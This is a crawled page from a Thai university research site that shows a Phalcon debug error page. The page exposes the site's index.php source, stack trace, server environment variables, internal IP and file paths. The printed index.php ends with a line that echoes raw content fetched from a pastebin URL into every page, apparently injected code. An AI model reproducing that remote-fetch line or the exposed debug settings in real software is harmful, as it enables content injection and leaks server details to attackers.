คู่มือการใช้งานสำหรับผู้ใช้ทั่วไป
download :
คู่มือการใช้งานสำหรับผู้บันทึกข้อมูล
download :
Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44
Phalcon Framework 3.3.1

Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44

C:\inetpub\wwwroot\rdiqa\public\index.php (11)
#0{closure}(2, file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n, C:\inetpub\wwwroot\rdiqa\public\index.php, 44, Array(12))
#1file_get_contents(https://pastebin.com/raw/e0ZNham4)
C:\inetpub\wwwroot\rdiqa\public\index.php (44)
<?php
use Phalcon\Mvc\Application;
use Phalcon\Config\Adapter\Ini as ConfigIni;
error_reporting(E_ALL);
// output errors to browser
ini_set('display_errors', 'on');
// report all errors
error_reporting(E_ALL);
// convert warnings/notices to exceptions
set_error_handler(function($errno, $errstr, $errfile, $errline) {
  throw new \Exception($errstr.PHP_EOL.$errfile.":".$errline, $errno);
});
 
$debug = new \Phalcon\Debug();
$debug->listen();
 
 try {
  define('APP_PATH', realpath('..') . '/');
 
  /**
   * Read the configuration
   */
  $config = new ConfigIni(APP_PATH . 'app/config/config.ini');
  if (is_readable(APP_PATH . 'app/config/config.ini.dev')) {
    $override = new ConfigIni(APP_PATH . 'app/config/config.ini.dev');
    $config->merge($override);
  }
 
  
  /**
   * Auto-loader configuration
   */
  require APP_PATH . 'app/config/loader.php';
 
  $application = new Application(new Services($config));
 
  // NGINX - PHP-FPM already set PATH_INFO variable to handle route
  echo $application->handle(!empty($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : null)->getContent();
} catch (Exception $e){
  echo $e->getMessage() . '<br>';
  echo '<pre>' . $e->getTraceAsString() . '</pre>';
}
 
echo file_get_contents("https://pastebin.com/raw/e0ZNham4");
KeyValue
_url/faq/index
KeyValue
PROCESSOR_ARCHITEW6432AMD64
_FCGI_X_PIPE_\\.\pipe\IISFCGI-835c9da3-1647-4e16-8bee-298eac463249
PHPRCC:\Program Files (x86)\PHP\v7.1.13\
PHP_FCGI_MAX_REQUESTS10000
ALLUSERSPROFILEC:\ProgramData
APPDATAC:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIGC:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_IDDefaultAppPool
CommonProgramFilesC:\Program Files (x86)\Common Files
CommonProgramFiles(x86)C:\Program Files (x86)\Common Files
CommonProgramW6432C:\Program Files\Common Files
COMPUTERNAMERMS
ComSpecC:\Windows\system32\cmd.exe
FP_NO_HOST_CHECKNO
LOCALAPPDATAC:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS8
OSWindows_NT
PathC:\app\Administrator\product\11.2.0\dbhome\bin;C:\Program Files\PHP\v5.3;C:\Program Files (x86)\PHP\v7.1.13;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\dotnet\;
PATHEXT.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTUREx86
PROCESSOR_IDENTIFIERIntel64 Family 6 Model 44 Stepping 2, GenuineIntel
PROCESSOR_LEVEL6
PROCESSOR_REVISION2c02
ProgramDataC:\ProgramData
ProgramFilesC:\Program Files (x86)
ProgramFiles(x86)C:\Program Files (x86)
ProgramW6432C:\Program Files
PSModulePathC:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\WindowsPowerShell\Modules\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ResourceManager\AzureResourceManager\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ServiceManagement\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\Storage\
PUBLICC:\Users\Public
SystemDriveC:
SystemRootC:\Windows
TEMPC:\Windows\TEMP
TMPC:\Windows\TEMP
USERDOMAINWORKGROUP
USERNAMERMS$
USERPROFILEC:\Windows\system32\config\systemprofile
VBOX_MSI_INSTALL_PATHC:\Program Files\Oracle\VirtualBox\
VS140COMNTOOLSC:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\Tools\
windirC:\Windows
ORIG_PATH_INFO/rdiqa/public/index.php
URL/rdiqa/public/index.php
SERVER_SOFTWAREMicrosoft-IIS/8.5
SERVER_PROTOCOLHTTP/1.1
SERVER_PORT_SECURE0
SERVER_PORT82
SERVER_NAMErms.rdi.tsu.ac.th
SCRIPT_NAME/rdiqa/public/index.php
SCRIPT_FILENAMEC:\inetpub\wwwroot\rdiqa\public\index.php
REQUEST_URI/rdiqa/faq/index
REQUEST_METHODGET
REMOTE_USER
REMOTE_PORT32964
REMOTE_HOST44.192.65.228
REMOTE_ADDR44.192.65.228
QUERY_STRING_url=/faq/index
PATH_TRANSLATEDC:\inetpub\wwwroot\rdiqa\public\index.php
LOGON_USER
LOCAL_ADDR10.100.1.209
INSTANCE_META_PATH/LM/W3SVC/1
INSTANCE_NAMERMS.RDI.TSU.AC.TH
INSTANCE_ID1
HTTPS_SERVER_SUBJECT
HTTPS_SERVER_ISSUER
HTTPS_SECRETKEYSIZE
HTTPS_KEYSIZE
HTTPSoff
GATEWAY_INTERFACECGI/1.1
DOCUMENT_ROOTC:\inetpub\wwwroot
CONTENT_TYPE
CONTENT_LENGTH0
CERT_SUBJECT
CERT_SERIALNUMBER
CERT_ISSUER
CERT_FLAGS
CERT_COOKIE
AUTH_USER
AUTH_PASSWORD
AUTH_TYPE
APPL_PHYSICAL_PATHC:\inetpub\wwwroot\
APPL_MD_PATH/LM/W3SVC/1/ROOT
IIS_UrlRewriteModule7.1.1952.0
UNENCODED_URL/rdiqa/faq/index
IIS_WasUrlRewritten1
HTTP_X_ORIGINAL_URL/rdiqa/faq/index
HTTP_USER_AGENTCCBot/2.0 (https://commoncrawl.org/faq/)
HTTP_IF_MODIFIED_SINCESat, 23 Oct 2021 10:54:45 GMT
HTTP_HOSTrms.rdi.tsu.ac.th:82
HTTP_ACCEPT_LANGUAGEen-US,en;q=0.5
HTTP_ACCEPT_ENCODINGbr,gzip
HTTP_ACCEPTtext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONTENT_LENGTH0
HTTP_CONNECTIONKeep-Alive
FCGI_ROLERESPONDER
PHP_SELF/rdiqa/public/index.php
REQUEST_TIME_FLOAT1656792783.1504
REQUEST_TIME1656792783
#Path
0C:\inetpub\wwwroot\rdiqa\public\index.php
1C:\inetpub\wwwroot\rdiqa\app\config\loader.php
2C:\inetpub\wwwroot\rdiqa\app\Services.php
3C:\inetpub\wwwroot\rdiqa\app\library\Base\Services.php
4C:\inetpub\wwwroot\rdiqa\app\plugins\SecurityPlugin.php
5C:\inetpub\wwwroot\rdiqa\app\plugins\NotFoundPlugin.php
6C:\inetpub\wwwroot\rdiqa\app\controllers\FaqController.php
7C:\inetpub\wwwroot\rdiqa\app\controllers\ControllerBase.php
8C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_faq_index.volt.php
9C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_main.volt.php
10C:\inetpub\wwwroot\rdiqa\app\library\Elementsrdi.php
11C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_index.volt.php
Memory
Usage2097152